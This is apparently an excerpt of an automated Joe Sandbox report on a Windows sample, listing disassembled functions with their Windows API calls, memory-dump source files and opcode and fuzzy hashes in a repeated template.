Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: fd0f05cfaf8a5909ef1806ac14a5969485805dd0530763119ec1e314a0dd144f
Instruction ID: 27e20a84c5cdbde60fe8300d68f0a6f94c5ca3fc151ebd1653d65dfbbacfed56
Opcode Fuzzy Hash: fd0f05cfaf8a5909ef1806ac14a5969485805dd0530763119ec1e314a0dd144f
Instruction Fuzzy Hash: 9D512C75A00209EFCF54DF68D885EAE7BB6FB44320F14826DF9159B290D734AD91CB90

Function 007B6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 007B6CE4
WSAGetLastError.WSOCK32(00000000), ref: 007B6CF4

Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007B6D58
WSAGetLastError.WSOCK32(00000000), ref: 007B6D64

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 5ae3e4e3c2ee8b4a3fac4982931aca8101bbb585ec9d586b0b7e9835481cd5ab
Instruction ID: de717408f3c0321d70261cf6f974bde7dd4272a097acb06b489aa635bd33f4d2
Opcode Fuzzy Hash: 5ae3e4e3c2ee8b4a3fac4982931aca8101bbb585ec9d586b0b7e9835481cd5ab
Instruction Fuzzy Hash: 69418174740214AFEB10AF24DC8AF7A77E5DB44B10F44C018FA599F2D2DB799D008791

Function 007B672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,007CF910), ref: 007B67BA
_strlen.LIBCMT ref: 007B67EC

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: abefac51adfa6c824d1dddce19610dab01841007b0a6b593c5ec2fda9be60235
Instruction ID: 6f84e75a3600b34b5ba9aa52235fe66aa6ff01601fe0552fb9957afcccc71844
Opcode Fuzzy Hash: abefac51adfa6c824d1dddce19610dab01841007b0a6b593c5ec2fda9be60235
Instruction Fuzzy Hash: DE417371A00104EBCB14EB64DCD9FEEB7A9EF44314F148169F91697292DB3CAD04CB51

Function 007ABA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007ABB09
GetLastError.KERNEL32(?,00000000), ref: 007ABB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007ABB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007ABB80

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: bde92f1a995597a309addf5f384cc3381ea8125c95e44c4ed156cad2234e0617
Instruction ID: dea44eede118e632b0ebba4f1151a5ec9b9edf45f8fa1b07ef49f36a81f7bbd9
Opcode Fuzzy Hash: bde92f1a995597a309addf5f384cc3381ea8125c95e44c4ed156cad2234e0617
Instruction Fuzzy Hash: 4B410839200610DFCB11EF15C589A5EBBE5EF8A310B19C498F94A9B762CB39FD01CB91

Function 007C8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007C8B4D

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 57c0f458dfb378e4d6ccc277322050a7109186254c1926058ac28ddd4d47749d
Instruction ID: 064b6a8e7b7ed74d2a83848141470e2e2129b371ec4de6f32f31c72d5131101a
Opcode Fuzzy Hash: 57c0f458dfb378e4d6ccc277322050a7109186254c1926058ac28ddd4d47749d
Instruction Fuzzy Hash: 4A3192F4600208BEEFA09F18CC45FA977A5FB05310F64861EFA51D72A1DF38AD609752

Function 007CADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 007CAE1A
GetWindowRect.USER32(?,?), ref: 007CAE90
PtInRect.USER32(?,?,007CC304), ref: 007CAEA0
MessageBeep.USER32(00000000), ref: 007CAF11

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: dda71af567bcc0fffc9fa9bb2dfed7b9bfc88172f56b68d5e8a486bfbd8ccfa2
Instruction ID: 681faf3f97d6a49c17097dcaac1cba3f7d94e1cc7567c668d35a167a4abedbf2
Opcode Fuzzy Hash: dda71af567bcc0fffc9fa9bb2dfed7b9bfc88172f56b68d5e8a486bfbd8ccfa2
Instruction Fuzzy Hash: 5E418870A0021DEFCB11CF58C885FA9BBF5FB4831AF1881ADE9149B251D734E951DB92

Function 007A0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007A1037
SetKeyboardState.USER32(00000080,?,00000001), ref: 007A1053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007A10B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007A110B

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5aebcbe4e71039e710d8fdbc94152c4d2b7df0b222423188a534415f60ecbbb2
Instruction ID: 9a2fa4bacc625aec9e639b317d9b27feb7ad831f2f6c5f23f0021b599eac9034
Opcode Fuzzy Hash: 5aebcbe4e71039e710d8fdbc94152c4d2b7df0b222423188a534415f60ecbbb2
Instruction Fuzzy Hash: 43314B30E44698AEFB308B658C09BFBBBA9ABC7310F84431AE580521D1C37D8DD09765

Function 007A1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 007A1176
SetKeyboardState.USER32(00000080,?,00008000), ref: 007A1192
PostMessageW.USER32(00000000,00000101,00000000), ref: 007A11F1
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 007A1243

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f287b15f14dcff7cae0b19c79d652a5545a6325f374fcc173a4f3d0005e3348f
Instruction ID: 599be86e2c8a387065de5cfefd964dc80f79178c017a6f805a7d5ca14404a14d
Opcode Fuzzy Hash: f287b15f14dcff7cae0b19c79d652a5545a6325f374fcc173a4f3d0005e3348f
Instruction Fuzzy Hash: 51310730A4061C9EFF208B65CC08BFA7BAAABCB310F84835BE681921D1C33C89559755

Function 00776415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0077644B
__isleadbyte_l.LIBCMT ref: 00776479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007764A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007764DD

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 053d1f1ebf17b2609d26402f51b03d66bae203295da81e7608253cf96509064b
Instruction ID: 448650c9cea9f07ea6d3f50b3ddecb4510d2c23035d2934c3640a9b644b0daba
Opcode Fuzzy Hash: 053d1f1ebf17b2609d26402f51b03d66bae203295da81e7608253cf96509064b
Instruction Fuzzy Hash: EF310F30600A86EFDF218F75CC44BAA7BA5FF01390F198028E859871A4EB39DA50DB90

Function 007C5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 007C5189

Part of subcall function 007A387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007A3897
Part of subcall function 007A387D: GetCurrentThreadId.KERNEL32 ref: 007A389E
Part of subcall function 007A387D: AttachThreadInput.USER32(00000000,?,007A52A7), ref: 007A38A5

GetCaretPos.USER32(?), ref: 007C519A
ClientToScreen.USER32(00000000,?), ref: 007C51D5
GetForegroundWindow.USER32 ref: 007C51DB

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: f03dd68f6b6f3ba1a99106006802de582e94726120aba08673c4085d8b2e613d
Instruction ID: f916372c3e42ac5e26290a3bd6e012d219a4aef073d3ba57f4945dbf5f9b99bb
Opcode Fuzzy Hash: f03dd68f6b6f3ba1a99106006802de582e94726120aba08673c4085d8b2e613d
Instruction Fuzzy Hash: 8331F071900108AFDB04EFA5C849EEFB7F9EF98300F10806AE515E7251EB799E45CBA0

Function 007CC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

GetCursorPos.USER32(?), ref: 007CC7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0077BBFB,?,?,?,?,?), ref: 007CC7D7
GetCursorPos.USER32(?), ref: 007CC824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0077BBFB,?,?,?), ref: 007CC85E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 5dfeb6d511cfe96b213ea931267b136135adc23226bfc5cf8af9d16994310498
Instruction ID: 98e90e9a1efc61bd0a8da79900e9670005a813e275cb16894e3d1eb98ac0fb2a
Opcode Fuzzy Hash: 5dfeb6d511cfe96b213ea931267b136135adc23226bfc5cf8af9d16994310498
Instruction Fuzzy Hash: AA317E35600018AFCB16CF58D898EEB7BFAFB49310F04816DF9098B261D7399D61DBA0

Function 00760BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00760BF2

Part of subcall function 00745B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007A7B20,?,?,00000000), ref: 00745B8C
Part of subcall function 00745B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007A7B20,?,?,00000000,?,?), ref: 00745BB0

_fprintf.LIBCMT ref: 00760C29
OutputDebugStringW.KERNEL32(?), ref: 00796331

Part of subcall function 00764CDA: _flsall.LIBCMT ref: 00764CF3

__setmode.LIBCMT ref: 00760C5E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 2c17b288cff33d250fbcfb4b91d0bd52e3593ac8805aa85e09f7415bea067be5
Instruction ID: 0ea971a7a87451b0854ade0394634c604bc3e996e825a9a7248318b05bdeb86b
Opcode Fuzzy Hash: 2c17b288cff33d250fbcfb4b91d0bd52e3593ac8805aa85e09f7415bea067be5
Instruction Fuzzy Hash: 39112432A04204FFCB05B7B4AC4A9BE7B69DF81320F14421AF60657292EF2C2D5597A5

Function 00798B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00798652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00798669
Part of subcall function 00798652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00798673
Part of subcall function 00798652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00798682
Part of subcall function 00798652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00798689
Part of subcall function 00798652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0079869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00798BEB
_memcmp.LIBCMT ref: 00798C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00798C44
HeapFree.KERNEL32(00000000), ref: 00798C4B

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 25db18495ef8a3b1f742cf2ceefd79ab587ff289ef8983f322b4500417c4a5b6
Instruction ID: 18e2faa2a0215919d556f5ac9bea4ef976ee24994b9902c3b2d42c8790727404
Opcode Fuzzy Hash: 25db18495ef8a3b1f742cf2ceefd79ab587ff289ef8983f322b4500417c4a5b6
Instruction Fuzzy Hash: 0E21A171D01208EFCF00DF94D948BEEB7B8EF42340F084099E454A7241DB38AE05CB61

Function 007B1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007B1A97

Part of subcall function 007B1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007B1B40
Part of subcall function 007B1B21: InternetCloseHandle.WININET(00000000), ref: 007B1BDD

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 136814334b6ba9d54334adfb2a0cb4f7e314647f3d7e7c3b7be0677be75c664d
Instruction ID: 82792e92d6b3896807e0be86c3bed831afdbfb104e76af5b89f2b9a15b60d3ed
Opcode Fuzzy Hash: 136814334b6ba9d54334adfb2a0cb4f7e314647f3d7e7c3b7be0677be75c664d
Instruction Fuzzy Hash: B821D171201600BFDB119F608C18FFBB7AEFF48700F90401AFA0196661EB39E8219BA4

Function 0079E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0079F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0079E1C4,?,?,?,0079EFB7,00000000,000000EF,00000119,?,?), ref: 0079F5BC
Part of subcall function 0079F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0079F5E2
Part of subcall function 0079F5AD: lstrcmpiW.KERNEL32(00000000,?,0079E1C4,?,?,?,0079EFB7,00000000,000000EF,00000119,?,?), ref: 0079F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0079EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0079E1DD
lstrcpyW.KERNEL32(00000000,?), ref: 0079E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,0079EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0079E237

Strings

cdecl, xrefs: 0079E22E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 716cd08da0f2996f184baa1be9c6b13f338e4cf53a5e46e5dd356fad8da7f89b
Instruction ID: 3daf5ae5318726750f9c52111e84d44463980de629f6eb55913fdee4792acf5f
Opcode Fuzzy Hash: 716cd08da0f2996f184baa1be9c6b13f338e4cf53a5e46e5dd356fad8da7f89b
Instruction Fuzzy Hash: C811AC36200245EFCF25AF64E849E7A77A9FF84310B44802AE806CB260EB79D85187A4

Function 00775332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00775351

Part of subcall function 0076594C: __FF_MSGBANNER.LIBCMT ref: 00765963
Part of subcall function 0076594C: __NMSG_WRITE.LIBCMT ref: 0076596A
Part of subcall function 0076594C: RtlAllocateHeap.NTDLL(01670000,00000000,00000001,00000000,?,?,?,00761013,?), ref: 0076598F

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
